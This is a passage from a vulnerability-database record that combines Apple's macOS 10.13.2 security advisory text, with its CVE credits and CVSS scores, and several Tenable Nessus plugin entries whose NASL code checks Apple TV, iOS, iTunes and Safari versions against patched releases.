Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input 
sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. 
This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bug can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. 
Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: July 27, 2020\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254", "CVE-2017-12837", "CVE-2017-13847", "CVE-2017-13848", "CVE-2017-13855", "CVE-2017-13858", "CVE-2017-13860", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13871", "CVE-2017-13872", "CVE-2017-13875", "CVE-2017-13876", "CVE-2017-13878", "CVE-2017-13883", "CVE-2017-13886", "CVE-2017-13887", "CVE-2017-13892", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-3735", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7154", "CVE-2017-7155", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7163", "CVE-2017-7171", "CVE-2017-7172", 
"CVE-2017-7173", "CVE-2017-9798"], "modified": "2017-12-06T00:00:00", "id": "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "href": "https://support.apple.com/kb/HT208331", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:37:17", "description": "According to its banner, the version of Apple TV on the remote device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these vulnerabilities.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-05T00:00:00", "type": "nessus", "title": "Apple TV < 11.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13833", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162"], "modified": "2019-06-04T00:00:00", "cpe": 
["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105612", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105612);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\n \"CVE-2017-7154\",\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-7162\",\n \"CVE-2017-13833\",\n \"CVE-2017-13855\",\n \"CVE-2017-13856\",\n \"CVE-2017-13861\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13866\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13870\",\n \"CVE-2017-13876\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-6-4\");\n\n script_name(english:\"Apple TV < 11.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208327\");\n # https://seclists.org/fulldisclosure/2017/Dec/29\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?262ee1b8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.2 or later. 
Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15K106\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_WARNING\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-30T14:46:54", "description": "The version of Apple iOS running on the mobile device is prior to 11.2. 
It is, therefore, affected by multiple vulnerabilities as referenced in the HT208334 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-07T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13833", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13888", "CVE-2017-13891", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-2411", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7152", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2022-11-30T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_112_CHECK.NBIN", "href": 
"https://www.tenable.com/plugins/nessus/105075", "sourceData": "Binary data apple_ios_112_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:51:51", "description": "The version of Apple iOS running on the mobile device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208334 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2 Multiple Vulnerabilities (APPLE-SA-2017-12-13-6)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13833", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-7152", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162"], "modified": "2019-04-17T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": 
"700544.PRM", "href": "https://www.tenable.com/plugins/nnm/700544", "sourceData": "Binary data 700544.prm", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:51:49", "description": "The version of Apple Safari installed on the remote host is prior to 11.0.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208324 security advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-08T00:00:00", "type": "nessus", "title": "Apple Safari < 11.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-04-08T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700501.PRM", "href": "https://www.tenable.com/plugins/nnm/700501", "sourceData": "Binary data 700501.prm", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:37:18", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.2. 
It is, therefore, affected by multiple vulnerabilities in webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_2_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/105652", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105652);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181, 102192);\n\n 
script_name(english:\"Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.2. It is, therefore, affected by multiple vulnerabilities\nin webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208326\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"12.7.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:37:43", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.0.2. 
It is, therefore, affected by multiple vulnerabilities as described in the HT208324 security advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-03T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 11.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI11_0_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105515", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105515);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-13-5\");\n\n script_name(english:\"macOS : Apple Safari < 11.0.2 Multiple Vulnerabilities\");\n 
script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 11.0.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208324 security advisory.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208324\");\n # https://lists.apple.com/archives/security-announce/2017/Dec/msg00007.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?752a7790\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 11.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and 
